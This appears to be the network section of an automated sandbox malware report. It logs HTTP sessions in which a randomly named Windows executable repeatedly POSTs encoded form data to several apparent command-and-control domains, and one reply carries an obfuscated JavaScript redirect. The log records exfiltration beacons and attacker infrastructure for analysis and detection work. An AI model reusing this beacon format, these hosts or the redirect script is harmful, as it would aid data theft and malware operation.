                                                                Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.650014154.88.22.101804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:54.296211958 CET749OUTPOST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 6e 44 39 31 79 6c 33 42 43 61 69 71 56 49 7a 6a 66 53 51 59 68 48 38 32 67 69 77 35 6e 41 57 61 32 50 37 76 6c 61 79 55 7a 4b 36
                                                                Data Ascii: 6dr=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TnD91yl3BCaiqVIzjfSQYhH82giw5nAWa2P7vlayUzK6
                                                                Nov 27, 2024 08:55:55.855292082 CET364INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>y!neQf.6PGZ0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.650015154.88.22.101804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:56.956094027 CET773OUTPOST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6e 2b 32 69 36 43 35 48 41 38 59 32 33 37 39 79 57 56 62 48 76 5a 5a 77 64 4f 65 74 49 6c 47 44 65 34 32 53 58 6e 49 57 59 6b 4b 77 3d 3d
                                                                Data Ascii: 6dr=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxn+2i6C5HA8Y2379yWVbHvZZwdOetIlGDe42SXnIWYkKw==
                                                                Nov 27, 2024 08:55:58.505959034 CET364INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>y!neQf.6PGZ0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.650016154.88.22.101804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:59.627667904 CET1786OUTPOST /jhb8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Origin: http://www.t91rl7.pro
                                                                Referer: http://www.t91rl7.pro/jhb8/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 65 48 75 33 38 65 37 65 69 6e 49 41 7a 6c 77 67 32 55 67 42 55 4b 41 55 6e 56 32 77 69 30 46 6d 66 6d 41 46 45 58 65 76 52 67 45 53 4b 6d 38 56 75 48 45 45 4e 65 66 50 33 2b 4f 6f 73 6d 50 55 57 35 50 67 4c 41 48 5a 65 6c 74 2f 33 71 6a 59 73 34 34 36 57 6d 2f 54 6a 78 7a 70 79 4f 72 4e 53 44 73 56 57 4c 59 48 6d 6d 7a 43 56 68 71 39 56 43 74 70 68 36 72 2f 66 61 57 52 4a 76 53 39 6e 61 62 6b 75 36 56 69 32 68 66 30 50 4b 54 56 35 4f 37 7a 73 6d 56 51 50 58 31 6b 34 70 55 50 69 4e 5a 33 [TRUNCATED]
                                                                Data Ascii: 6dr=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxeHu38e7einIAzlwg2UgBUKAUnV2wi0FmfmAFEXevRgESKm8VuHEENefP3+OosmPUW5PgLAHZelt/3qjYs446Wm/TjxzpyOrNSDsVWLYHmmzCVhq9VCtph6r/faWRJvS9nabku6Vi2hf0PKTV5O7zsmVQPX1k4pUPiNZ3HB7CoYF+WApD+8lmP8P/BUvg8ovoVLGrRpH1p0/wtEjpiYaiRRE5bn1tcCxb04MD9Dy2z2qJKhb6oMWSzw4JYPdkX6PH9FoqyF73RumXBi3pY7W/ytFNuctjb7Mo5ZjHN1a9gdk2OUh2o2KLowWnCzKm5HqwUqwxk92rXPCmxhlGHxzlb1xWVH1IMF0cA1b1W1msXkQmcIFP/eVFGW9yT5buqoSDvnUouWmDy54bENm7qd6vsCyRB3OSoNR55DWi7zytw2Xns2Yy9PwtQDBhvno4cQKpaVtNqYonzjJu1xvhPLVfurtG+RbNviPV1j2Jj7biI+MzayZhw9fYcrpFIRGGhtalS/yOlsdfYcWJgnWVC1q8k90xsslUISCR+fqd29JwO03Rt0AwhUdK7y3MsYQU5wcJaF4Qd142bl/LO7WcBKGeEwbaXVql+EfX0//P7hss1pjMtw4BH+UV0aBQOTFB/TCOeQLPRMxPGnTPPvqmu+lWug/N7/IJk3U7OvCSDOq6jVrUXlZ013YrbkHj8hpyZd4d8/pp68N8DdfcxoX19zaN2gCtgCZLf7EjM8Yk0Lwkj4E7uWEV0P4awNfZMY59pwUMBNXaMpteKQK9XSDSOQhhRAelCbD0W0unASZAQ1OyPsdzQKhmjt2nv+PRSmK6TPn0ed3ASp [TRUNCATED]
                                                                Nov 27, 2024 08:56:01.189699888 CET364INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Encoding: gzip
                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 55 be ee 81 15 3e 79 81 a6 be 21 6e 65 51 ce a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 ca 47 04 94 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>y!neQf.6PGZ0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.650017154.88.22.101804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:02.297992945 CET496OUTGET /jhb8/?6dr=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.t91rl7.pro
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:56:03.874685049 CET332INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:56:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                Strict-Transport-Security: max-age=31536000
                                                                Data Raw: 35 35 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 7a 4d 47 51 78 4c 6e 51 35 4d 54 46 76 5a 43 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 0d 0a 35 0d 0a 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 55<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly8zMGQxLnQ5MTFvZC5wcm86ODkxMQ==')</sc5ript>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.650019209.74.77.107804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:09.463917971 CET767OUTPOST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 53 4c 45 31 54 56 70 79 65 43 2b 35 53 2f 79 69 67 5a 6b 6b 74 71 74 39 78 78 69 56 48 6d 61 59 32 66 70 51 68 76 47 46 63 56 35
                                                                Data Ascii: 6dr=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3SLE1TVpyeC+5S/yigZkktqt9xxiVHmaY2fpQhvGFcV5
                                                                Nov 27, 2024 08:56:10.717557907 CET533INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:10 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.650020209.74.77.107804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:12.127145052 CET791OUTPOST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4b 76 39 7a 70 51 56 6e 6d 77 61 32 6e 70 43 32 6a 68 4b 6f 77 61 72 66 6b 37 57 58 57 4c 56 75 32 2b 69 46 64 77 70 37 6b 4d 42 77 3d 3d
                                                                Data Ascii: 6dr=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29Kv9zpQVnmwa2npC2jhKowarfk7WXWLVu2+iFdwp7kMBw==
                                                                Nov 27, 2024 08:56:13.425523043 CET533INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:56:13 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.650021209.74.77.107804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:56:14.802114964 CET1804OUTPOST /alu5/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.learnwithus.site
                                                                Origin: http://www.learnwithus.site
                                                                Referer: http://www.learnwithus.site/alu5/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 47 49 33 31 4c 67 74 58 4a 4d 72 64 62 4c 68 6b 52 63 54 33 32 33 65 6d 76 6d 44 48 66 51 48 35 4a 74 6b 4a 30 74 43 46 6a 4b 64 4e 4f 72 75 56 49 2b 71 36 35 75 55 43 76 52 56 76 7a 55 77 43 2f 75 7a 67 61 6e 67 45 32 6e 76 7a 51 78 37 79 55 7a 75 6b 41 2f 2f 72 6a 58 73 37 4d 51 31 56 6a 70 67 2b 36 62 51 48 43 41 2f 4f 78 69 58 4a 36 67 72 35 5a 54 54 56 4a 55 49 70 67 70 7a 52 76 31 45 54 30 44 71 67 76 67 52 75 67 6b 78 75 68 47 53 2f 74 56 75 61 6b 65 50 53 6f 31 4f 66 45 33 4f 6b [TRUNCATED]
